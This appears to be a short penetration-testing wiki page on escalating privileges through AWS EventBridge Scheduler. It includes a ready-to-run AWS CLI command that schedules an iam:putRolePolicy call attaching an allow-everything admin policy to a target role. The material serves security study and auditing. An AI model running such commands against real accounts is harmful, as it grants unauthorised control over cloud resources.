AWS - EventBridge Scheduler Privesc

Reading time: 2 minutes

EventBridge Scheduler

More info EventBridge Scheduler in:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

An attacker with those permissions will be able to create|update an scheduler and abuse the permissions of the scheduler role attached to it to perform any action

For example, they could configure the schedule to invoke a Lambda function which is a templated action:

aws scheduler create-schedule \
    --name MyLambdaSchedule \
    --schedule-expression "rate(5 minutes)" \
    --flexible-time-window "Mode=OFF" \
    --target '{
        "Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
        "RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
    }'

In addition to templated service actions, you can use universal targets in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "AdminAccessPolicy", using a role that has "putRolePolicy" policy:

aws scheduler create-schedule \
    --name GrantAdminToTargetRoleSchedule \
    --schedule-expression "rate(5 minutes)" \
    --flexible-time-window "Mode=OFF" \
    --target '{
        "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
        "RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
        "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
    }'

References

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html